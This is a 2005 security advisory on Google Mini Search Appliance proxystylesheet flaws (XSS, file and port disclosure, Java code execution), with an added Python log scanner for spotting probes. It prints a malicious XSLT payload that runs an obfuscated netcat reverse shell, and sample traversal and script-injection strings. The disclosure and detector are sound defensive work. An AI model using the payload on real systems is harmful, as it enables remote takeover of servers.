[NEWS] Google Search Appliance Proxystylesheet XSLT Multiple Vulnerabilities (XSS, Information disclosure, Java Code Execution)
From: SecuriTeam (support_at_securiteam.com)
Date: 11/21/05
To: list@securiteam.com Date: 21 Nov 2005 16:18:38 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Google Search Appliance Proxystylesheet XSLT Multiple Vulnerabilities
(XSS, Information disclosure, Java Code Execution)
------------------------------------------------------------------------
SUMMARY
"The Google Mini <http://www.google.com/enterprise/> offers
cost-effective, high-quality search for your public website or intranet."
By supplying a malicious XSLT style sheet, an attacker can execute
arbitrary programs, retrieve system information, or cause cross-site
scripting (XSS) on the Google Mini appliance.
DETAILS
Vulnerable Systems:
* Google Mini Search Appliance
The Google Search Appliance allows customization of the search interface
through XSLT style sheets. Certain versions of the appliance allow a
remote URL to be supplied as the path to the XSLT style sheet. This
feature can be abused to perform cross-site scripting (XSS), file
discovery, service enumeration, and arbitrary command execution.
The Google Search Appliance search interface uses the 'proxystylesheet'
form variable to determine which style sheet to apply to the search
results. This variable can be a local file name or an HTTP URL.
Error Message XSS:
A cross-site scripting flaw can be exploited by providing a snippet of
malicious JavaScript code as the proxystylesheet value. The appliance
will look for a local file by that name and then display an error message
containing the JavaScript code.
XSLT Style Sheet XSS:
A cross-site scripting flaw can be exploited by creating a malicious XSLT
style sheet and specifying the URL of this style sheet in the
proxystylesheet parameter. The appliance will download the style sheet and
present the malicious JavaScript to the user who executed the search.
Information disclosure 1:
It is possible to determine the existence of any file on the system by
using a relative path from the style sheet directory. The error message
returned from the server will disclose whether or not a valid path was
provided. This can be used to fingerprint the base operating system and
kernel version.
Information disclosure 2:
A rudimentary port scan can be performed by requesting HTTP URLs that
point to a target system and individual ports on that system. The error
message returned from the server will differ between open and closed
ports. The appliance will ignore requests to connect back to itself, but
no other restrictions apply.
XSLT Java Code Execution:
It is possible to execute arbitrary Java class methods on the appliance by
creating a malicious XSLT style sheet. System commands can be executed as
an unprivileged user, which, combined with the vulnerable kernel version,
can lead to a remote root shell. The appliance uses the Saxon XSLT parser,
which allows the following snippet to work:
<!-- Google Mini XSLT Code Execution [metasploit] -->
XSLT Version: <xsl:value-of select="system-property('xsl:version')"/>
<br/>
XSLT Vendor: <xsl:value-of select="system-property('xsl:vendor')"/>
<br/>
XSLT URL: <xsl:value-of select="system-property('xsl:vendor-url')"/>
<br/>
OS: <xsl:value-of select="sys:getProperty('os.name')"/>
<br/>
Version: <xsl:value-of select="sys:getProperty('os.version')"/>
<br/>
Arch: <xsl:value-of select="sys:getProperty('os.arch')"/>
<br/>
UserName: <xsl:value-of select="sys:getProperty('user.name')"/>
<br/>
UserHome: <xsl:value-of select="sys:getProperty('user.home')"/>
<br/>
UserDir: <xsl:value-of select="sys:getProperty('user.dir')"/>
<br/>
Executing command...<br/>
<xsl:value-of select="run:exec(run:getRuntime(), 'sh -c nc${IFS}255.255.255.255${IFS}53|sh|nc${IFS}255.255.255.255${IFS}53')"/>
</span>
</xsl:template>
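Every issue above is driven by the value of the proxystylesheet parameter, so a defender can find probing in the appliance's (or a front proxy's) access logs. The following Python check is an added example, not code from the advisory or from Metasploit; the log lines, client addresses and the allowed style sheet name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote
# Constructed sample access-log lines (not from the advisory): one benign search,
# then proxystylesheet values of each shape the advisory describes.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Nov/2005:16:18:38 +0200] "GET /search?q=budget&proxystylesheet=default_frontend HTTP/1.1" 200 5120
10.0.0.9 - - [21/Nov/2005:16:19:02 +0200] "GET /search?q=x&proxystylesheet=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 812
10.0.0.9 - - [21/Nov/2005:16:19:10 +0200] "GET /search?q=x&proxystylesheet=../../../../etc/passwd HTTP/1.1" 200 790
10.0.0.9 - - [21/Nov/2005:16:19:20 +0200] "GET /search?q=x&proxystylesheet=http://192.0.2.10:22/ HTTP/1.1" 200 801
10.0.0.9 - - [21/Nov/2005:16:19:31 +0200] "GET /search?q=x&proxystylesheet=http://192.0.2.10/evil.xsl HTTP/1.1" 200 640
"""
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
SCHEME_RE = re.compile(r"[a-z][a-z0-9+.-]*://")
ALLOWED_STYLESHEETS = {"default_frontend"}  # names configured on the appliance (assumed)

def classify(value):
    """Label one proxystylesheet value with the advisory finding it resembles."""
    v = unquote(value)  # decode once more so double-encoded values are still caught
    low = v.lower()
    if SCHEME_RE.match(low):
        # Remote URL: hosted XSLT (XSS / code execution) or connect-back probe; odd port = port scan
        try:
            port = urlsplit(v).port
        except ValueError:  # malformed port, e.g. "http://h:abc/"
            port = -1
        if port not in (None, 80, 443):
            return "remote-url-odd-port (port scan)"
        return "remote-url (remote XSLT: XSS / Java code execution)"
    if "<" in v or "javascript:" in low:
        return "markup-in-name (error message XSS)"
    if "/" in v or "\\" in v or ".." in v:
        return "path-in-name (file existence disclosure)"
    return "ok" if v in ALLOWED_STYLESHEETS else "unknown-stylesheet-name"

def scan(log_text):
    """Return (client_ip, value, label) for every request whose value is not 'ok'."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client_ip = line.split(" ", 1)[0]
        query = urlsplit(m.group(1)).query
        # parse_qs percent-decodes each value once before classify() sees it
        for value in parse_qs(query, keep_blank_values=True).get("proxystylesheet", []):
            label = classify(value)
            if label != "ok":
                findings.append((client_ip, value, label))
    return findings
```

Running scan(SAMPLE_LOG) flags the four probing requests and leaves the benign search alone; in production the allowed-name set should be the appliance's real front-end list.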
Vendor Status:
The vendor has issued a fix for customers.
ADDITIONAL INFORMATION
The information has been provided by HD Moore <mailto:fdlist@digitaloffense.net>.
The original article can be found at:
http://metasploit.com/research/vulns/google_proxystylesheet/
OSVDB advisories can be found at: http://osvdb.org/20977,
http://osvdb.org/20978, http://osvdb.org/20979, http://osvdb.org/20980,
http://osvdb.org/20981
Google's Mini appliance security issues can be found at:
http://www.google.com/support/gsa/bin/answer.py?answer=15857